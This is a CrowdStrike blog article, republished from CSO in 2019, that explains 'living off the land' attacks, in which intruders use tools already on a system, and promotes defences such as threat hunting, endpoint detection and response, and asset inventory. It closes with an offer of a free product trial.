Going Beyond Malware: The Rise of “Living off the Land” Attacks

Hacker Hand Over Binary Code

This article was originally published on CSO, April 30, 2019

If you’re living off the land, there are a few different methods you can use to survive, but you need to use what you find where you are. You do not have the option to bring in supplies to maintain yourself. If you are looking for someone living off the land, you must hunt — as they have blended into their new environment.

The same is true of cybersecurity because there is no silver bullet that can identify all types of threats at all times, especially when the adversary is using your tools they found in the environment. The ability to block advanced threats improves each year, but sophisticated adversaries are determined and creative, and their techniques evolve just as quickly.

While malware continues to be a tool often used in the initial intrusion, it is often only the precursor to an attack, not the ultimate objective. This initial intrusion is leading to more sophisticated and stealthy techniques, such as “living off the land” (LOTL), tradecraft that uses native tools already present on the system to accomplish the adversaries’ main objective.

LOTL tactics, which do not involve malware, have picked up significantly in the world of cyber espionage in recent years. In fact, malware-free attacks in general have surged in recent years, accounting for 40 percent of the total number of cyberattacks globally last year: according to the 2019 CrowdStrike® Global Threat Report, attackers continue to shift to defense evasion methods, like living off the land techniques, to remain undetected. The longer an attacker can “dwell” or remain undetected in an environment, the more opportunity they have to find, exfiltrate and destroy data or operations.

The purpose of living off the land is two-fold. By using such features and tools, attackers are hoping to blend into the victim’s network and hide their activity in a sea of legitimate processes. Secondly, even if malicious activity involving these tools is detected, it is much harder to attribute attacks. If everyone is using similar tools, it’s more difficult to distinguish one group from another.

This raises a few questions: What do we do differently to avoid such attacks? When prevention fails, what do we have left to protect our organizations? How can we discover gaps as fast as possible?

Having techniques in play to detect and respond to ongoing attacks quickly is just as important as prevention. Here are a few options organizations can use:

Compromise Assessment

A compromise assessment (CA) has the briefing of answering the key question “Am I compromised?” This is an exercise where current and historical events are examined to answer the key question. To effectively answer this question you must use tools that will identify signs of historical attacks, such as suspicious registry keys and suspicious output files, as well as identifying active threats. Many sophisticated adversaries spend months and years in their victims’ networks without being detected and the CA historical analysis is critical to identifying if this has happened.

Managed Threat Hunting

Threat hunting is a critical discipline that more organizations are using to disrupt stealthy attacks before they become mega breaches. With managed threat hunting, you are engaging a team of expert threat hunters for a simple, but important task: to continuously sift through your enterprise security data, looking for faint signs of the most sophisticated attacks. Managed threat hunting services are tailor-made to fill this critical gap for organizations of all types.

Stopping “Silent Failure”

Regardless of how advanced your defenses are, there’s a chance that attackers will do an “end run” on your security solution and slip through to gain access to your environment. Conventional defenses don’t know and can’t see when this happens, resulting in “silent failure.” When silent failure occurs, it can allow attackers to dwell in your environment for days, weeks or even months without raising an alarm. Hence, more organizations are considering endpoint detection and response (EDR) solutions to address the incidents that aren’t being handled adequately by their existing defenses. The solution lies in continuous and comprehensive visibility into what is happening on your endpoints in real time.

Account Monitoring

Account monitoring and management controls can detect and prevent unauthorized activities by providing full visibility into work environments. It enables preventing loss of data due to such activities and violations of credentials, while allowing resource owners to control who has access to the data and indicating whether the access is inappropriately granted.

Application Inventory

This proactively identifies outdated and unpatched applications and operating systems so you can securely manage all the applications in your environment. Streamlining your application inventory with an IT hygiene solution solves security and cost problems simultaneously. Visibility enabled via IT hygiene prevents exploits related to patches and system updates. It also optimizes your software configuration. Real-time and historical views of application usage identify unused software that can be removed, potentially saving your organization thousands of dollars in unnecessary licensing fees.

Asset Inventory

Asset Inventory shows you what machines are running on your network and allows you to deploy your security architecture effectively to ensure that no rogue systems are operating behind your walls. It enables security and IT ops to differentiate between managed, unmanaged and unmanageable assets in your environment and take appropriate steps to improve overall security.

Additional Resources

CrowdStrike Falcon Free Trial

Try CrowdStrike Free for 15 Days Get Started with A Free Trial